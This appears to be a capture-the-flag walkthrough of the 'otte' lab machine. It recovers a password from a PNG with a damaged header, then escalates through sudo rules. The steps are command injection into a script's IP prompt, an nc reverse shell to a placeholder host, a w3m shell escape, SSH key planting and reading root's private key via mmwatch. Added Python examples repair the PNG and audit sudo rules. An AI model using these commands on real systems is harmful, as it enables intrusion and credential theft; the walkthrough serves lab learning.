 www-data@otte:/home/thomas$ cat nightmare.txt
 cat nightmare.txt
 who is the son of a bitch who replaced the signature on my file with fucking XXX?! I need to find the original signature!
 www-data@otte:/home/thomas$

Download important_file to the local machine and check its content; the file header has been overwritten.

 less important_file
 important_file  (press RETURN)
 00000000: XXXXXXXXXXXXXXXX 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....

...

Searching for IHDR on Google shows this is a PNG file. Replace the XXXX bytes with the normal PNG file signature (89 50 4e 47 0d 0a 1a 0a).

 head important_file  
 00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452  .XXX........IHDR
 00000010: 0000 012c 0000 012c 0806 0000 0079 7d8e  ...,...,.....y}.
 00000020: 7500 0000 1b74 4558 7443 7265 6174 696f  u....tEXtCreatio
 00000030: 6e20 5469 6d65 0031 3632 3130 3037 3337  n Time.162100737
 00000040: 3935 3239 15fc b9e2 0000 37e9 4944 4154  9529......7.IDAT
 00000050: 78da ed9d 8bab 7ecf 55de f38f 168a 2085  x.....~.U..... .
 00000060: 2214 410a 2208 2294 8214 4428 8582 286a  ".A."."...D(..(j
 00000070: bd50 898a d6b6 62b0 28a2 a849 9a18 a3b9  .P....b.(..I....
 00000080: 7889 a931 3626 8d9a 8ba6 8947 3e5f ddb8  x..16&.....G>_..
 00000090: ddee 99f5 ccac 35b3 67ef 773d 3090 7c7f  ......5.g.w=0.|.
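The repair is mechanical once you know the format: the first eight bytes of any PNG are a fixed signature, and the chunk that follows is always IHDR with a 13-byte body and a CRC over its type and data. The Python below is an added example for doing that repair and then checking the result, not code from the original walkthrough; its sample input is a constructed 1x1 PNG, plus the first 33 bytes of the dump above (the signature shown as X bytes followed by the IHDR chunk), used only to decode the image dimensions:

```python
import struct
import zlib

# The eight-byte PNG signature that was overwritten with "X" bytes in the dump above.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# A PNG's first chunk must be IHDR, and its length field is always 13.
IHDR_PREFIX = b"\x00\x00\x00\x0dIHDR"


def png_chunk(ctype, data):
    """Encode one chunk: big-endian length, type, data, CRC32 over type+data."""
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_sample_png(width=1, height=1):
    """Constructed sample input: a tiny 8-bit RGBA PNG (not the walkthrough's important_file)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    # One scanline per row: filter byte 0 followed by `width` opaque red pixels.
    raw = b"".join(b"\x00" + b"\xff\x00\x00\xff" * width for _ in range(height))
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(raw)) + png_chunk(b"IEND", b""))


def looks_like_headerless_png(data):
    """True when the signature is damaged but an IHDR chunk sits at offset 8, as in the dump."""
    return data[:8] != PNG_SIGNATURE and data[8:16] == IHDR_PREFIX


def repair_png_signature(data):
    """Return a copy with the first eight bytes replaced by the real PNG signature."""
    if not looks_like_headerless_png(data):
        raise ValueError("not a PNG with a damaged signature")
    return PNG_SIGNATURE + data[8:]


def iter_chunks(data):
    """Yield (type, length, crc_ok) per chunk; crc_ok is False for a truncated chunk."""
    pos = 8
    while pos + 8 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        end = pos + 12 + length
        if end > len(data):
            yield ctype, length, False
            return
        body = data[pos + 8:pos + 8 + length]
        (stored,) = struct.unpack(">I", data[pos + 8 + length:end])
        yield ctype, length, (zlib.crc32(ctype + body) & 0xFFFFFFFF) == stored
        pos = end
        if ctype == b"IEND":
            return


def verify_png(data):
    """Structural check after repair: signature, IHDR first, every CRC intact, IEND last."""
    if data[:8] != PNG_SIGNATURE:
        return False, "bad signature"
    chunks = list(iter_chunks(data))
    if not chunks or chunks[0][0] != b"IHDR":
        return False, "missing IHDR"
    bad = [ctype.decode("latin-1") for ctype, _, ok in chunks if not ok]
    if bad:
        return False, "CRC mismatch in " + ",".join(bad)
    if chunks[-1][0] != b"IEND":
        return False, "missing IEND"
    return True, "ok"


def ihdr_info(data):
    """Decode width, height, bit depth and colour type from the IHDR data at offset 16."""
    width, height, depth, colour, _, _, _ = struct.unpack(">IIBBBBB", data[16:29])
    return {"width": width, "height": height, "bit_depth": depth, "color_type": colour}


# First 33 bytes of the dump above: damaged signature, then the complete IHDR chunk.
WALKTHROUGH_HEADER = b"X" * 8 + bytes.fromhex(
    "0000000d49484452" "0000012c0000012c0806000000" "797d8e75")


if __name__ == "__main__":
    damaged = b"X" * 8 + build_sample_png()[8:]
    repaired = repair_png_signature(damaged)
    print(verify_png(damaged), verify_png(repaired), ihdr_info(repaired))
    print(ihdr_info(repair_png_signature(WALKTHROUGH_HEADER)))
```

Running `verify_png` after the signature swap is the useful part: if the IHDR CRC checks out, only the signature was touched; a CRC failure would mean more of the file was altered than the note suggests. The dump's IHDR decodes to a 300x300, 8-bit, colour type 6 (RGBA) image, which matches a QR code rendered with an alpha channel.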

Use CyberChef to render the PNG file; it is a QR code.

[image-20210523212230214.png]

Decode the QR code to get a link.

[image-20210523212429143.png]

Visit https://eqrcode.co/a/SVxQdM to get the password of thomas.

Log in via SSH as thomas and check sudo.

 thomas@otte:/home/laetitia$ sudo -l
 Matching Defaults entries for thomas on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User thomas may run the following commands on otte:
     (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *

Run simpler.py; when it asks for an IP, enter a shell command instead.

 thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
 ***********************************************
      _                 _
  ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
 / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
 \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
 |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                 |_|               |_|    |___/
                                 @ironhackers.es

 ***********************************************

 Enter an IP: $("/bin/bash")
 laetitia@otte:~$

This shell is not interactive; run 'nc x.x.x.x xxxx -e /bin/bash' from it to get another reverse shell, which is interactive.

[image-20210523220810457.png]

Check sudo again, as laetitia.

 laetitia@otte:~$ sudo -l
 sudo -l
 Matching Defaults entries for laetitia on otte:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User laetitia may run the following commands on otte:
     (cedric) NOPASSWD: /usr/bin/w3m

Use PHP to start a temporary HTTP server on the local machine, open it with w3m, and spawn a shell from there.

 sudo -u cedric /usr/bin/w3m http://192.168.56.150

Then run !/bin/bash inside w3m; now we are user cedric.

[image-20210523221401950.png]

In /home/cedric/.ssh, fetch our id_rsa.pub as authorized_keys.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys

Then we can log in via SSH as cedric.

Check sudo again.

 cedric@otte:~$ sudo -l
 Matching Defaults entries for cedric on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cedric may run the following commands on otte:
     (ALL : ALL) NOPASSWD: /usr/bin/mmwatch
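Each of the three `sudo -l` outputs on this box carries a configuration smell that an audit can flag mechanically: a NOPASSWD rule, a trailing `*` that accepts arbitrary extra arguments, an interpreter running a script out of a home directory, a pager/browser with a documented shell escape, and a run-as ALL grant to a custom binary. The Python below is an added example of such an audit, not code from the walkthrough or the target; it parses the three outputs above as sample input. The binary lists are this example's own assumptions and are deliberately short:

```python
import os
import re

# The three `sudo -l` outputs shown in this walkthrough, used here as sample input.
SUDO_L_OUTPUTS = [
r"""Matching Defaults entries for thomas on otte:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User thomas may run the following commands on otte:
    (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *
""",
r"""Matching Defaults entries for laetitia on otte:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User laetitia may run the following commands on otte:
    (cedric) NOPASSWD: /usr/bin/w3m
""",
r"""Matching Defaults entries for cedric on otte:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cedric may run the following commands on otte:
    (ALL : ALL) NOPASSWD: /usr/bin/mmwatch
""",
]

USER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):$")
# "(runas) TAG: TAG: /path/to/cmd args" as printed by sudo -l.
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

# Assumed lists for this example: interpreters run whatever the script does, and these
# programs can start a subshell from inside (w3m's "!" is used in this very walkthrough).
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "php", "sh", "bash"}
SHELL_ESCAPE_BINS = {"w3m", "less", "more", "man", "vi", "vim"}


def parse_sudo_l(text):
    """Turn `sudo -l` output into rule dicts: user, host, runas, tags, cmd."""
    user, host, rules = None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            user, host = m.group("user"), m.group("host")
            continue
        m = RULE_RE.match(line)
        if m and user:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append({"user": user, "host": host, "runas": m.group("runas").strip(),
                          "tags": tags, "cmd": m.group("cmd").strip()})
    return rules


def audit_rule(rule):
    """Return the set of finding codes that apply to one sudo rule."""
    argv = rule["cmd"].split()
    binary = os.path.basename(argv[0])
    findings = set()
    if "NOPASSWD" in rule["tags"]:
        findings.add("nopasswd")              # no re-authentication before the grant is used
    if "*" in argv[1:]:
        findings.add("wildcard_arg")          # any extra arguments are accepted
    if binary in INTERPRETERS:
        findings.add("interpreter")           # the grant is really "run this script's code"
    if any(arg.startswith("/home/") for arg in argv[1:]):
        findings.add("script_in_home")        # the home's owner controls what actually runs
    if binary in SHELL_ESCAPE_BINS:
        findings.add("shell_escape")          # program can spawn a shell as the run-as user
    if rule["runas"].split()[0] == "ALL":
        findings.add("runas_all")             # includes root; the binary needs a code review
    return findings


def audit_outputs(outputs):
    """Audit every rule in every `sudo -l` output; returns (user, runas, cmd, sorted findings)."""
    return [(r["user"], r["runas"], r["cmd"], sorted(audit_rule(r)))
            for text in outputs for r in parse_sudo_l(text)]


if __name__ == "__main__":
    for user, runas, cmd, findings in audit_outputs(SUDO_L_OUTPUTS):
        print(f"{user} -> ({runas}) {cmd}: {', '.join(findings) or 'clean'}")
```

The same parser works on `sudo -l` output collected from a fleet, which is the point: each of the three hops on this box is a rule that would have been flagged before anyone used it.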

After checking the code of mmwatch, we find we can read root's id_rsa through it.

 sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"

Then we can log in via SSH as root.

 root@otte:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 otte
 root@otte:~# ls -la /root
 total 40
 drwx------  4 root root 4096 May 20 10:30 .
 drwxr-xr-x 18 root root 4096 May 15 12:07 ..
 lrwxrwxrwx  1 root root    9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
 drwxr-xr-x  3 root root 4096 May 15 12:13 .local
 -rw-------  1 root root 1500 May 15 13:23 .mysql_history
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 -rwx------  1 root root   33 May 16 14:02 root.txt
 drwx------  2 root root 4096 May 16 13:24 .ssh
 -rw-r--r--  1 root root  173 May 15 12:19 .wget-hsts
 -rw-------  1 root root  100 May 20 10:30 .Xauthority